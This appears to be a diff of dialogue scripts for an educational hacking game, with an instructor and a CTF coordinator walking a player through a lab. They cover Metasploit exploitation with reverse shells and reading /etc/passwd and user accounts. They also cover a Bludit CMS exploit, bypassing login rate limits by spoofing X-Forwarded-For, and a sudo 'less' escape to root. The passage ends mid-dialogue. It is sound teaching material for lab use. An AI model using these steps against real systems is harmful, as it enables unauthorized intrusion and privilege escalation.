Specialist: You can see compatible payloads with: show payloads + + Exploitation Specialist: For Windows targets, common choices include: + + Exploitation Specialist: windows/shell/reverse_tcp - Basic command shell + + Exploitation Specialist: windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features + + Exploitation Specialist: For Linux targets: + + Exploitation Specialist: cmd/unix/reverse - Simple Unix shell + + Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux + + ~ instructor_rapport += 5 + ++ [What if the exploit doesn't work?] + Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. + + Exploitation Specialist: Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST. + + Exploitation Specialist: Try restarting the target VM - sometimes services crash after failed exploit attempts. + + Exploitation Specialist: Verify the target is actually running the vulnerable software at that version. + + Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. + + ~ instructor_rapport += 5 + ++ [What can I do once I have a shell?] + Exploitation Specialist: With a Windows shell, you can run commands like: + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check your privileges) + + Exploitation Specialist: For Linux shells: + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (check current user) + + Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_intro === +Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. + +~ instructor_rapport += 5 + +Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. + +Exploitation Specialist: Armitage can scan networks, automatically suggest attacks, and visualize compromised systems. + ++ [How is Armitage different from msfconsole?] + Exploitation Specialist: Msfconsole is a command-line interface that gives you complete control and flexibility. + + Exploitation Specialist: Armitage provides a graphical interface that visualizes the network and automates finding attacks. + + Exploitation Specialist: Armitage can look at scan results and automatically suggest which exploits might work against each target. + + Exploitation Specialist: It's particularly useful for beginners or when you want to quickly test multiple targets. + + Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. + + ~ instructor_rapport += 5 + ++ [How do I start Armitage?] + Exploitation Specialist: First, initialize the Metasploit database if you haven't already: + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: Then start Armitage: armitage & + + Exploitation Specialist: The & runs it in the background so you can continue using your terminal. + + Exploitation Specialist: Leave the connection options as default and click "Connect" + + Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. + + ~ instructor_rapport += 5 + ++ [What does the Armitage interface show?] + Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. + + Exploitation Specialist: Each host is represented by an icon - the icon shows the detected operating system. + + Exploitation Specialist: Compromised systems are shown in red with lightning bolts. + + Exploitation Specialist: You can right-click hosts to see suggested attacks, launch exploits, or interact with shells. + + Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_usage === +Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. + +~ instructor_rapport += 5 + +Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. + ++ [How do I scan with Armitage?] + Exploitation Specialist: Click the "Hosts" menu, select "Nmap Scan", then choose a scan type. + + Exploitation Specialist: "Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET + + Exploitation Specialist: Enter the IP address to scan and Armitage will run Nmap. + + Exploitation Specialist: Results are automatically imported into the Metasploit database and displayed visually. + + Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. + + ~ instructor_rapport += 5 + ++ [How does Armitage suggest attacks?] + Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. + + Exploitation Specialist: First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor + + Exploitation Specialist: Then click: Attacks → Find attacks + + Exploitation Specialist: Armitage will match detected services to available exploits in Metasploit. + + Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. + + ~ instructor_rapport += 5 + ++ [How do I launch an attack in Armitage?] + Exploitation Specialist: Right-click the target host and select "Attack" + + Exploitation Specialist: Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret + + Exploitation Specialist: Click "Launch" and Armitage will configure and run the exploit. + + Exploitation Specialist: If successful, the host icon turns red showing it's compromised! + + Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. + + ~ instructor_rapport += 5 + ++ [How do I interact with a compromised system?] + Exploitation Specialist: Right-click the compromised (red) host. + + Exploitation Specialist: Look for "Meterpreter 1" or "Shell 1" depending on the payload used. + + Exploitation Specialist: Click "Interact" → "Command shell" to open a terminal. + + Exploitation Specialist: You can now run commands like "dir" on Windows or "ls" on Linux. + + Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== vulnerability_databases === +Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. + +~ instructor_rapport += 5 + +Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. + +Exploitation Specialist: Different databases have different focuses and information, so it's worth checking multiple sources. + ++ [What are the main vulnerability databases?] + Exploitation Specialist: Here are the most important ones: + + Exploitation Specialist: CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations. + + Exploitation Specialist: NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository. + + Exploitation Specialist: SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums. + + Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. + + ~ instructor_rapport += 5 + ++ [What information do these databases provide?] + Exploitation Specialist: Vulnerability databases typically include: + + Exploitation Specialist: CVE numbers - unique identifiers for each vulnerability. + + Exploitation Specialist: Severity scores (CVSS) - numerical ratings of how serious the vulnerability is. + + Exploitation Specialist: Affected versions - which specific software versions are vulnerable. + + Exploitation Specialist: Technical descriptions of the vulnerability. + + Exploitation Specialist: References to patches, advisories, and sometimes proof-of-concept code. + + Exploitation Specialist: Information about whether exploits exist in the wild. + + ~ instructor_rapport += 5 + ++ [Do all vulnerabilities have CVEs?] + Exploitation Specialist: No! This is an important point. + + Exploitation Specialist: CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs. + + Exploitation Specialist: Sometimes researchers publish vulnerabilities before CVEs are assigned. + + Exploitation Specialist: Some vendors have their own vulnerability identifiers. + + Exploitation Specialist: Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet. + + Exploitation Specialist: This is why checking multiple sources and forums is important. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== exploit_db === +Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. + +Exploitation Specialist: Kali Linux includes a local copy of the entire database! + ++ [How do I search Exploit-DB online?] + Exploitation Specialist: Visit exploit-db.com and use their search function. + + Exploitation Specialist: You can search by software name, version, platform, or exploit type. + + Exploitation Specialist: Each exploit listing includes the source code, often in Python, C, PHP, or other languages. + + Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. + + ~ instructor_rapport += 5 + ++ [How do I use the local Exploit-DB copy?] + Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ + + Exploitation Specialist: They're organized by platform: windows, linux, osx, etc. + + Exploitation Specialist: You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv + + ~ instructor_rapport += 5 + ++ [What's searchsploit?] + Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. + + Exploitation Specialist: It's much faster and more convenient than manually searching files. + + Exploitation Specialist: Basic usage: searchsploit easyftp + + Exploitation Specialist: You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 5 + ++ [How do I use standalone exploits from Exploit-DB?] + Exploitation Specialist: Standalone exploits often require some manual setup: + + Exploitation Specialist: You might need to edit the source code to set the target IP address. + + Exploitation Specialist: Some exploits require compilation (C/C++ code). + + Exploitation Specialist: Python exploits might need specific library dependencies. + + Exploitation Specialist: Read the exploit code comments carefully - they usually explain how to use it. + + Exploitation Specialist: Always understand what an exploit does before running it! + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== commands_reference === +Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Initial Scanning:** + +Exploitation Specialist: nmap -sV 10.X.X.2-3 (scan for two servers) + +Exploitation Specialist: nmap -O -sV -p 1-65535 TARGET (comprehensive scan) + +Exploitation Specialist: **Metasploit Database Setup:** + +Exploitation Specialist: sudo msfdb reinit + +Exploitation Specialist: sudo service postgresql start + +Exploitation Specialist: msfconsole (start Metasploit console) + ++ [Show me scanning from msfconsole] + Exploitation Specialist: **Scanning from Msfconsole:** + + Exploitation Specialist: msf > nmap -O -sV TARGET + + Exploitation Specialist: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: msf > db_import scan_output.xml + + Exploitation Specialist: **Database Queries:** + + Exploitation Specialist: msf > hosts (show all hosts) + + Exploitation Specialist: msf > services (show all services) + + Exploitation Specialist: msf > services -p 21 (show services on port 21) + + Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit scanning modules] + Exploitation Specialist: **Metasploit Port Scanners:** + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/ (TAB to see options) + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: msf auxiliary(tcp) > set RHOSTS TARGET + + Exploitation Specialist: msf auxiliary(tcp) > set THREADS 10 + + Exploitation Specialist: msf auxiliary(tcp) > run + + Exploitation Specialist: msf auxiliary(tcp) > services + + Exploitation Specialist: msf auxiliary(tcp) > back + + ~ instructor_rapport += 3 + ++ [Show me searching for exploits] + Exploitation Specialist: **Searching for Exploits:** + + Exploitation Specialist: msf > help search + + Exploitation Specialist: msf > search easyftp + + Exploitation Specialist: msf > search type:exploit platform:Windows + + Exploitation Specialist: msf > search type:exploit cve:2003-0352 + + Exploitation Specialist: msf > search buffer overflow + + Exploitation Specialist: msf > search type:exploit platform:linux + + Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret + + ~ instructor_rapport += 3 + ++ [Show me launching exploits] + Exploitation Specialist: **Launching Exploits:** + + Exploitation Specialist: msf > use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: msf exploit(...) > show options + + Exploitation Specialist: msf exploit(...) > set RHOST TARGET_IP + + Exploitation Specialist: msf exploit(...) > show payloads + + Exploitation Specialist: msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: msf exploit(...) > set LHOST YOUR_KALI_IP + + Exploitation Specialist: msf exploit(...) > check (if supported) + + Exploitation Specialist: msf exploit(...) > exploit + + ~ instructor_rapport += 3 + ++ [Show me post-exploitation commands] + Exploitation Specialist: **Post-Exploitation Commands (Windows):** + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check privileges) + + Exploitation Specialist: type C:\path\to\flag.txt (read file) + + Exploitation Specialist: **Post-Exploitation Commands (Linux):** + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (current user) + + Exploitation Specialist: cat flag (read flag file) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Exploitation Specialist: **Armitage Setup:** + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: armitage & + + Exploitation Specialist: **Armitage Workflow:** + + Exploitation Specialist: 1. Hosts → Nmap Scan → Quick Scan (OS detect) + + Exploitation Specialist: 2. Armitage → Set Exploit Rank → Poor + + Exploitation Specialist: 3. Attacks → Find attacks + + Exploitation Specialist: 4. Right-click host → Attack → select exploit → Launch + + Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell + + ~ instructor_rapport += 3 + ++ [Show me Exploit-DB commands] + Exploitation Specialist: **Exploit Database:** + + Exploitation Specialist: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: less /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: searchsploit easyftp + + Exploitation Specialist: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 3 + +- -> exploitation_hub + +=== challenge_tips === +Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Finding Vulnerable Services:** + +Exploitation Specialist: Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET + +Exploitation Specialist: Pay close attention to service versions - specific version numbers are key to finding exploits. + +Exploitation Specialist: Import results into Metasploit for easier targeting: db_nmap -sV TARGET + ++ [Tips for exploiting the Windows server?] + Exploitation Specialist: The Windows server is running EasyFTP with a known vulnerability. + + Exploitation Specialist: Search for it: search easyftp + + Exploitation Specialist: Look for the module ending in "cwd_fixret" + + Exploitation Specialist: Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp + + Exploitation Specialist: Make sure to set LHOST to YOUR Kali IP (the host-only network address). + + Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting the Linux server?] + Exploitation Specialist: The Linux server has multiple potentially vulnerable services. + + Exploitation Specialist: Scan all ports to find everything running: nmap -sV -p- TARGET + + Exploitation Specialist: Look for services like vsftpd, IRC, or other network services. + + Exploitation Specialist: Search Metasploit for exploits matching those services. + + Exploitation Specialist: Remember to use a Unix reverse shell payload: cmd/unix/reverse + + Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. + + ~ instructor_rapport += 5 + ++ [Tips for using Armitage?] + Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. + + Exploitation Specialist: Make sure you set the exploit rank to "Poor" or you'll miss some exploits. + + Exploitation Specialist: Don't just click the first suggested attack - read the module info to understand what it does. + + Exploitation Specialist: Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1. + + Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. + + Exploitation Specialist: RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP. + + Exploitation Specialist: If services stop responding, restart the target VM - exploits often crash vulnerable services. + + Exploitation Specialist: After successfully exploiting a service once, you'll need to restart the VM to exploit it again. + + Exploitation Specialist: Be patient - some exploits take time to establish connections. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Exploitation Specialist: For the Windows server, look on a user's Desktop. + + Exploitation Specialist: Navigate with: cd C:\Users or cd C:\Documents and Settings + + Exploitation Specialist: List directories with: dir + + Exploitation Specialist: Read flag files with: type flag.txt + + Exploitation Specialist: For the Linux server, flags are typically in user home directories. + + Exploitation Specialist: Navigate with: cd /home + + Exploitation Specialist: List directories with: ls -la + + Exploitation Specialist: Read flags with: cat flag + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== ready_for_practice === +Exploitation Specialist: Excellent! You're ready to start practical exploitation. + +~ instructor_rapport += 10 +~ exploitation_mastery += 10 + +Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. + +Exploitation Specialist: Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes. + +Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access. + ++ [Any final advice before I start?] + Exploitation Specialist: Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit. + + Exploitation Specialist: Don't rush. Take time to understand what each exploit does and why it works. + + Exploitation Specialist: If something doesn't work, check your settings, restart the target, and try again. + + Exploitation Specialist: Try both msfconsole and Armitage to see which you prefer. + + Exploitation Specialist: Most importantly: always verify you're targeting the right system and have authorization! + + Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. + + ~ instructor_rapport += 10 + +- -> exploitation_hub + +-> END diff --git a/story_design/ink/game_scenarios/feeling_blu_ctf.ink b/story_design/ink/game_scenarios/feeling_blu_ctf.ink new file mode 100644 index 0000000..64cb9bd --- /dev/null +++ b/story_design/ink/game_scenarios/feeling_blu_ctf.ink @@ -0,0 +1,598 @@ +// Feeling Blu Challenge - Web Security CTF Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/9_feeling_blu.md +// Author: Anatoliy Gorbenko, Z. Cliffe Schreuders, Andrew Scholey +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR ctf_mastery = 0 +VAR challenge_mode = "guided" // "guided" or "ctf" + +// External variables +EXTERNAL player_name + +=== start === +CTF Challenge Coordinator: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. + +~ instructor_rapport = 0 +~ ctf_mastery = 0 + +CTF Challenge Coordinator: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. + +CTF Challenge Coordinator: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. + +CTF Challenge Coordinator: Before we begin, you need to choose how you want to approach this challenge. + +-> choose_path + +=== choose_path === +CTF Challenge Coordinator: How do you want to tackle this CTF challenge? + ++ [Pure CTF mode - minimal guidance, maximum challenge] + ~ challenge_mode = "ctf" + CTF Challenge Coordinator: Excellent choice! You'll get the full Capture The Flag experience. + + CTF Challenge Coordinator: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. + + CTF Challenge Coordinator: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. + + CTF Challenge Coordinator: Only come back for hints if you're truly stuck. Good luck! + + ~ ctf_mastery += 20 + -> ctf_mode_hub + ++ [Guided mode - walk me through the techniques] + ~ challenge_mode = "guided" + CTF Challenge Coordinator: A wise choice for learning! I'll guide you through each phase with explanations. + + CTF Challenge Coordinator: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. + + CTF Challenge Coordinator: This approach ensures you understand not just how to exploit, but why each technique works. + + ~ instructor_rapport += 10 + -> guided_mode_hub + +=== ctf_mode_hub === +CTF Challenge Coordinator: This is CTF mode - you're on your own! Here's what I can tell you: + +CTF Challenge Coordinator: Target: A web server running on your victim VM. + +CTF Challenge Coordinator: Objectives: Find multiple flags, gain shell access, escalate to root. + +CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. + ++ [What tools should I start with?] + CTF Challenge Coordinator: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. + + CTF Challenge Coordinator: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. + + CTF Challenge Coordinator: Look for hidden files, admin panels, and leaked credentials. + + ~ instructor_rapport += 5 + ++ [I'm stuck - give me a hint about reconnaissance] + -> ctf_recon_hints + ++ [I'm stuck - give me a hint about exploitation] + -> ctf_exploit_hints + ++ [I'm stuck - give me a hint about privilege escalation] + -> ctf_privesc_hints + ++ [Tell me about the web security tools] + -> web_tools_intro + ++ [I want to switch to guided mode] + -> switch_to_guided + ++ [I'm done - show me the solution walkthrough] + -> guided_mode_hub + ++ [That's all for now] + #exit_conversation + -> END + +=== ctf_recon_hints === +CTF Challenge Coordinator: Alright, here's a hint for reconnaissance: + +CTF Challenge Coordinator: Start with Nmap to identify services and versions: nmap -sV TARGET_IP + +CTF Challenge Coordinator: Use Dirb to find hidden directories: dirb http://TARGET_IP + +CTF Challenge Coordinator: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP + +CTF Challenge Coordinator: Look carefully at discovered files - some contain very useful information about usernames and passwords! + +CTF Challenge Coordinator: The CMS being used might have known exploits. Identify what CMS is running. + +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== ctf_exploit_hints === +CTF Challenge Coordinator: Here's a hint for exploitation: + +CTF Challenge Coordinator: You should have discovered Bludit CMS running on the server. + +CTF Challenge Coordinator: Search Metasploit for Bludit exploits: search bludit + +CTF Challenge Coordinator: You'll need both a username and password - these might have been leaked in hidden files. + +CTF Challenge Coordinator: If you only have the username, consider brute-forcing the password using OWASP ZAP. + +CTF Challenge Coordinator: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. + +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== ctf_privesc_hints === +CTF Challenge Coordinator: Here's a hint for privilege escalation: + +CTF Challenge Coordinator: After gaining initial access, check what sudo commands your user can run: sudo -l + +CTF Challenge Coordinator: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. + +CTF Challenge Coordinator: The 'less' command is particularly interesting - it can execute shell commands with ! + +CTF Challenge Coordinator: If you can run 'less' with sudo, you can escape to a root shell! + +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== switch_to_guided === +CTF Challenge Coordinator: Switching to guided mode. I'll walk you through the complete solution. + +~ challenge_mode = "guided" + +-> guided_mode_hub + +=== guided_mode_hub === +CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each phase of the challenge. + ++ [Part 1: Information gathering and reconnaissance] + -> phase_1_recon + ++ [Part 2: Exploitation and gaining access] + -> phase_2_exploitation + ++ [Part 3: Optional - Brute forcing with OWASP ZAP] + -> phase_3_bruteforce + ++ [Part 4: Post-exploitation and flag hunting] + -> phase_4_post_exploit + ++ [Part 5: Privilege escalation to root] + -> phase_5_privesc + ++ [Tell me about web security tools first] + -> web_tools_intro + ++ [Show me the complete solution] + -> complete_walkthrough + ++ [Switch to CTF mode (no more guidance)] + ~ challenge_mode = "ctf" + -> ctf_mode_hub + ++ [That's all for now] + #exit_conversation + -> END + +=== web_tools_intro === +CTF Challenge Coordinator: Let me introduce the key web security tools you'll need. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. + +CTF Challenge Coordinator: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. + +CTF Challenge Coordinator: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. + ++ [How do I use Dirb?] + CTF Challenge Coordinator: Dirb is straightforward: dirb http://TARGET_IP + + CTF Challenge Coordinator: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. + + CTF Challenge Coordinator: Pay attention to discovered files - they often contain credentials or sensitive configuration data. + + CTF Challenge Coordinator: Right-click discovered URLs to open them in your browser and examine their contents. + + ~ instructor_rapport += 5 + ++ [How do I use Nikto?] + CTF Challenge Coordinator: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP + + CTF Challenge Coordinator: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. + + CTF Challenge Coordinator: The output shows each finding with references for more information. + + CTF Challenge Coordinator: Nikto results help you understand what attacks might be successful. + + ~ instructor_rapport += 5 + ++ [How do I use OWASP ZAP?] + CTF Challenge Coordinator: OWASP ZAP acts as a proxy between your browser and the web server. + + CTF Challenge Coordinator: It intercepts HTTP requests and responses, allowing you to modify and replay them. + + CTF Challenge Coordinator: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. + + CTF Challenge Coordinator: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. + + ~ instructor_rapport += 5 + +- -> {challenge_mode == "ctf": ctf_mode_hub | guided_mode_hub} + +=== phase_1_recon === +CTF Challenge Coordinator: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. + +CTF Challenge Coordinator: Each phase builds on the previous, so thorough reconnaissance is crucial. + ++ [What should I scan for?] + CTF Challenge Coordinator: Start with network reconnaissance: nmap -sV TARGET_IP + + CTF Challenge Coordinator: This identifies open ports, running services, and software versions. + + CTF Challenge Coordinator: Then scan the web application: dirb http://TARGET_IP + + CTF Challenge Coordinator: Follow up with: nikto -h http://TARGET_IP + + CTF Challenge Coordinator: Look for admin panels, configuration files, backup files, and anything that might contain credentials. + + ~ instructor_rapport += 5 + ++ [What am I looking for specifically?] + CTF Challenge Coordinator: You're looking for several things: + + CTF Challenge Coordinator: What CMS (Content Management System) is running? This tells you what exploits might work. + + CTF Challenge Coordinator: Are there leaked credentials in discovered files? Check text files, logs, and backups. + + CTF Challenge Coordinator: Is there an admin login page? You might need to access it. + + CTF Challenge Coordinator: What server software and versions are running? This helps identify known vulnerabilities. + + CTF Challenge Coordinator: There's also a flag hidden in one of the discovered files! + + ~ instructor_rapport += 5 + ++ [Walk me through the reconnaissance process] + CTF Challenge Coordinator: Here's the step-by-step process: + + CTF Challenge Coordinator: 1. Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) + + CTF Challenge Coordinator: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) + + CTF Challenge Coordinator: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) + + CTF Challenge Coordinator: 4. Browse discovered URLs - open them in Firefox to see what they contain + + CTF Challenge Coordinator: 5. Look for patterns: usernames on the website, admin pages, leaked files + + CTF Challenge Coordinator: 6. Document everything - the CMS name, discovered usernames, any found credentials + + CTF Challenge Coordinator: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_2_exploitation === +CTF Challenge Coordinator: Phase 2 is exploitation - using discovered vulnerabilities to gain access. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Based on your reconnaissance, you should have identified Bludit CMS running on the server. + +CTF Challenge Coordinator: Bludit has known vulnerabilities that we can exploit using Metasploit. + ++ [How do I find Bludit exploits?] + CTF Challenge Coordinator: In Metasploit, search for Bludit: search bludit + + CTF Challenge Coordinator: You'll find several modules. Look for ones related to code execution or file upload. + + CTF Challenge Coordinator: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec + + CTF Challenge Coordinator: This particular exploit allows arbitrary code execution through image upload functionality. + + ~ instructor_rapport += 5 + ++ [What do I need to exploit Bludit?] + CTF Challenge Coordinator: The Bludit exploit requires several pieces of information: + + CTF Challenge Coordinator: RHOSTS: The target IP address + + CTF Challenge Coordinator: BLUDITUSER: The Bludit admin username (should have been discovered during recon) + + CTF Challenge Coordinator: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) + + CTF Challenge Coordinator: TARGETURI: Typically / (the root of the web server) + + CTF Challenge Coordinator: The exploit will give you a Meterpreter shell if successful! + + ~ instructor_rapport += 5 + ++ [What if I don't have the password?] + CTF Challenge Coordinator: If you found the username but not the password, you have options: + + CTF Challenge Coordinator: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups + + CTF Challenge Coordinator: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) + + CTF Challenge Coordinator: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible + + ~ instructor_rapport += 5 + ++ [Walk me through the exploitation] + CTF Challenge Coordinator: Here's the complete exploitation process: + + CTF Challenge Coordinator: 1. Start Metasploit: msfconsole + + CTF Challenge Coordinator: 2. Search: search bludit + + CTF Challenge Coordinator: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec + + CTF Challenge Coordinator: 4. Show options: show options + + CTF Challenge Coordinator: 5. Set target: set RHOSTS TARGET_IP + + CTF Challenge Coordinator: 6. Set username: set BLUDITUSER admin (or discovered username) + + CTF Challenge Coordinator: 7. Set password: set BLUDITPASS + + CTF Challenge Coordinator: 8. Run exploit: exploit + + CTF Challenge Coordinator: If successful, you'll get a Meterpreter shell! This is your foothold in the system. + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_3_bruteforce === +CTF Challenge Coordinator: Phase 3 is optional - brute forcing the Bludit password if you only have the username. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. + +CTF Challenge Coordinator: OWASP ZAP can bypass these protections with the right configuration. + ++ [How does CSRF protection work?] + CTF Challenge Coordinator: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. + + CTF Challenge Coordinator: The server sends a token in each response, and the client must include it in the next request. + + CTF Challenge Coordinator: This prevents simple replay attacks because each request needs the current token. + + CTF Challenge Coordinator: OWASP ZAP can extract tokens from responses and insert them into requests automatically. + + ~ instructor_rapport += 5 + ++ [How does rate limiting protection work?] + CTF Challenge Coordinator: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. + + CTF Challenge Coordinator: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." + + CTF Challenge Coordinator: However, we can bypass this using the X-Forwarded-For HTTP header. + + CTF Challenge Coordinator: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. + + ~ instructor_rapport += 5 + ++ [Walk me through the ZAP brute force process] + CTF Challenge Coordinator: This is complex, so pay attention: + + CTF Challenge Coordinator: 1. Launch OWASP ZAP and configure it as a proxy + + CTF Challenge Coordinator: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts + + CTF Challenge Coordinator: 3. Browse to the Bludit login page through ZAP + + CTF Challenge Coordinator: 4. Attempt a login to capture the HTTP request in ZAP's history + + CTF Challenge Coordinator: 5. Right-click the 